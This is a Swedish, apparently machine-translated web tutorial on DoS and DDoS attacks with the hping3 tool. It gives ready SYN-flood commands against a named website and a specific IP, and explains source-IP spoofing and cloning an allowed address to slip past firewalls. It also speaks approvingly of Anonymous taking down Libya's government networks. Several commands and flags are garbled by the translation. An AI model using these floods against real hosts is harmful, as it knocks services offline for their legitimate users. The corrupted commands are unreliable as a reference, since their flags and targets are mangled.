säkerhet

hping3 översvämningsdos

hping3 översvämningsdos
Denna handledning fokuserar på DDOS-attacker (Distributed Denial of Service) med hjälp av hping3-verktyget. Om du redan är bekant med DOS (Denial of Service) och DDOS-attacker kan du fortsätta läsa från hping3 praktiska instruktioner, annars rekommenderas att lära dig hur dessa attacker fungerar.

DOS-attacker


En DOS-attack (Denial of Service) är en mycket enkel teknik för att förneka tillgänglighet till tjänster (det är därför det kallas "denial of service" -attack). Denna attack består i att överbelasta målet med stora paket, eller en stor mängd av dem.

Även om denna attack är väldigt lätt att genomföra, äventyrar den inte informationen eller integriteten för målet, det är inte en penetrerande attack och syftar bara till att förhindra tillgång till målet.
Genom att skicka en mängd paket kan målet inte hantera angripare och hindra servern från att betjäna legitima användare.

DOS-attacker utförs från en enda enhet, därför är det enkelt att stoppa dem genom att blockera angriparens IP, ändå kan angriparen ändra och till och med förfalska (klona) mål-IP-adressen men det är inte svårt för brandväggar att hantera sådana attacker , i motsats till vad som händer med DDOS-attacker.

DDOS-attacker

En Distributed Denial of Service-attack (DDOS) liknar en DOS-attack men utförs från olika noder (eller olika angripare) samtidigt. Vanligtvis utförs DDOS-attacker av botnät. Botnät är automatiserade skript eller program som infekterar datorer för att utföra en automatiserad uppgift (i det här fallet en DDOS-attack). En hacker kan skapa ett botnet och infektera många datorer från vilka botnät kommer att starta DOS-attacker, det faktum att många botnät skjuter samtidigt gör DOS-attacken till en DDOS-attack (det är därför det kallas "distribuerat").

Naturligtvis finns det undantag där DDOS-attacker utfördes av riktiga mänskliga angripare, till exempel hackargruppen Anonym integrerad av tusentals människor världen över använde denna teknik mycket ofta på grund av dess enkla implementering (det krävdes bara volontärer som delade deras sak), det är till exempel hur Anonym lämnade Gaddafis libyska regering helt kopplad från under invasionen, den libyska staten lämnades försvarslös inför tusentals angripare från hela världen.

När denna typ av attacker utförs från många olika noder är det extremt svårt att förhindra och stoppa och normalt kräver speciell hårdvara att hantera, det beror på att brandväggar och defensiva applikationer inte är beredda att hantera tusentals angripare samtidigt. Detta är inte fallet med hping3, de flesta attacker som utförs med detta verktyg kommer att blockeras av defensiva enheter eller programvara, men det är användbart i lokala nätverk eller mot dåligt skyddade mål.

Om hping3

Med verktyget hping3 kan du skicka manipulerade paket. Detta verktyg låter dig styra paketens storlek, kvantitet och fragmentering för att överbelasta målet och kringgå eller attackera brandväggar. Hping3 kan vara användbart för säkerhets- eller kapacitetsteständamål, med det kan du testa brandväggseffektivitet och om en server kan hantera en stor mängd paket. Nedan hittar du instruktioner om hur du använder hping3 för säkerhetsteständamål.

Komma igång med DDOS-attacker med hping3:

På Debian och baserade Linux-distributioner kan du installera hping3 genom att köra:

# apt install hping3 -y

En enkel DOS-attack (inte DDOS) skulle vara:

# sudo hping3 -S --flod -V -p 80170.155.9.185

Var:
sudo: ger behörighet att köra hping3.
hping3:
ringer programmet hping3.
-S: specificerar SYN-paket.
-översvämning: skjut efter eget gottfinnande, svar ignoreras (det är därför som svar inte visas) och paket skickas snabbt som möjligt.
-V: Ordrikedom.
-s 80: port 80 kan du ersätta det här numret för den tjänst du vill attackera.
170.155.9.185: mål-IP.

Översvämma med SYN-paket mot port 80:

I följande exempel beskrivs en SYN-attack mot lacampora.org:

# sudo hping3 lacampora.org -q -n -d 120 -S -p 80 --flood --rand-source

Var:
Lacampora.org: är målet
-q: kort produktion
-n: visa mål-IP istället för värd.
-d 120: ställa in paketstorlek
-rand-källa: dölj IP-adress.

Följande exempel visar ett annat exempel på översvämning:

SYN-översvämning mot port 80:

# sudo hping3 - källa ivan.com -S -q -p 80 --flod

Med hping3 kan du också attackera dina mål med en falsk IP, för att kringgå en brandvägg kan du till och med klona din mål-IP själv eller någon tillåten adress du kanske känner (du kan uppnå det till exempel med Nmap eller en sniffer för att lyssna etablerad anslutningar).

Syntaksen skulle vara:

# sudo hping3 -a -S -q -p 80 - snabbare -c2

I detta praktiska exempel verkar attacken:

# sudo hping3 -a 190.0.175.100 190.0.175.100 -S -q -p 80 - snabbare -c2

Jag hoppas att du tyckte att den här guiden om hping3 var användbar. Fortsätt följa LinuxHint för fler tips och uppdateringar om Linux och nätverk.

Mus Emulera musklick genom att sväva med Clickless Mouse i Windows 10
Emulera musklick genom att sväva med Clickless Mouse i Windows 10
Att använda en mus eller tangentbord i fel hållning av överdriven användning kan resultera i många hälsoproblem, inklusive stam, karpaltunnelsyndrom o...
Mus Lägg till musgester i Windows 10 med dessa gratisverktyg
Lägg till musgester i Windows 10 med dessa gratisverktyg
Under senare år har datorer och operativsystem utvecklats kraftigt. Det fanns en tid då användare var tvungna att använda kommandon för att navigera g...
Mus Kontrollera och hantera musrörelser mellan flera skärmar i Windows 10
Kontrollera och hantera musrörelser mellan flera skärmar i Windows 10
Dual Display Mouse Manager låter dig kontrollera och konfigurera musrörelser mellan flera skärmar genom att sakta ner dess rörelser nära gränsen. Wind...